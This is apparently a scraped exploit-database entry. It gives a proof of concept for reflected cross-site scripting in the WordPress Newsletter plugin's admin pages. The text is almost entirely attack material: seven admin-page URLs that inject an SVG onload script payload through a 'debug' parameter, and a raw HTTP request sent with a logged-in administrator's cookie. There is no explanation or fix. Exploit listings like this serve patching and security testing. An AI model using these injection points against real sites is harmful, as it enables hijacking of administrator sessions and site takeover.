Share
## https://sploitus.com/exploit?id=WPEX-ID:6AD407FE-DB2B-41FB-834B-DD8C4F62B072
https://example.com/wp-admin/admin.php?page=newsletter_main_index&debug&<svg/onload=alert(/XSS/)>
https://example.com/wp-admin/admin.php?page=newsletter_main_main&debug&<svg/onload=alert(/XSS/)>
https://example.com/wp-admin/admin.php?page=newsletter_subscription_options&debug&<svg/onload=alert(/XSS/)>
https://example.com/wp-admin/admin.php?page=newsletter_subscription_antibot&debug&<svg/onload=alert(/XSS/)>
https://example.com/wp-admin/admin.php?page=newsletter_emails_index&debug&<svg/onload=alert(/XSS/)>
https://example.com/wp-admin/admin.php?page=newsletter_users_index&debug&<svg/onload=alert(/XSS/)>
https://example.com/wp-admin/admin.php?page=newsletter_main_extensions&debug&<svg/onload=alert(/XSS/)>

GET /wp-admin/admin.php?page=newsletter_main_index&debug&"><svg/onload=alert(/XSS/)> HTTP/1.1
Host: example.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: [logged in admin]
Upgrade-Insecure-Requests: 1